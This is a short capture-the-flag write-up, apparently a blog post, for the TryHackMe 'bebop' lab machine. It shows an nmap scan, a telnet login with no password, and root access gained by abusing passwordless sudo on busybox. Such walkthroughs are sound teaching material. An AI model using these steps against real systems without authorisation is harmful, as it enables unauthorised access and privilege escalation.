bebop | drone lovers CTF

bebop | drone lovers CTF

Hello everyone, Today's CTF is available at rated as an easy challenge so it won't be hard for someone just starting in the field, the concept is based on the Parrot Bebop drone and brings a huge inspiration of the memory of the DEFCON 23 speech "Knocking my neighbour's kids cruddy drone offline", feel free to give it a check, the talk carries a lot of good information.

Let's start with some enumeration
root@kali:~# nmap -sC -sV
Starting Nmap 7.80 ( ) at 2020-04-13 17:15 UTC
Nmap scan report for (
Host is up (0.00032s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
MAC Address: 02:17:77:E9:CA:4E (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.64 seconds
Telnet to the machine no credentials needed and the username is provided in the challenge.
root@kali:~# telnet
Connected to
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata:
Security Advisories:
FreeBSD Handbook:
Questions List:
FreeBSD Forums:

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
You can use "pkg info" to see a list of packages you have installed.
[pilot@freebsd ~]$
The user flag is in the user pilot directory.
[pilot@freebsd ~]$ ls
[pilot@freebsd ~]$ cat user.txt 
[pilot@freebsd ~]$
Privilege escalation
[pilot@freebsd /]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
[pilot@freebsd /]$ sudo /usr/local/bin/busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

And that's it, very quick tasty machine to exploit.

Happy Hacking

TryHackMe | Cyber Security Training
An online platform for learning and teaching cyber security, all through your browser.